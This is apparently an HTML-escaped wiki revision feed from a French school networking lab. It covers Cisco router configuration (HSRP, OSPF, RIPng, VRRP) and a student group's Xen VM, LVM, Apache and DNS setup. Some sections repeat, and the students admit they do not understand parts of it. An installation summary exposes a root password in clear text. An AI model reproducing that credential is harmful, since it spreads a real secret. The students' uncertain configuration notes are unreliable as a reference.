======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248                      &lt;br /&gt;
   ipv6 address FE80::42:2 link-local                                         &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
Question pour Redon addresse Ip à définir &lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   int XXXX&lt;br /&gt;
   ip address 10.10.10.2 255.255.255.0&lt;br /&gt;
   vrrp 1 ip 10.10.10.3                     &lt;br /&gt;
   vrrp 1 preempt                          //Activation de la préemption, si jamais le routeur tombe en panne, l'autre prend sa place&lt;br /&gt;
   vrrp 1 priority 100                     //Dans le vvrp n°1 on définit la priorité à 100, plus la priorité est élevé plus il sera sollicité&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
*******************************************************************************&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
Se le faire expliquer parce que rien compris &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51283</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51283"/>
				<updated>2019-11-28T10:44:43Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Creation du Raid5 avec mdadm */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
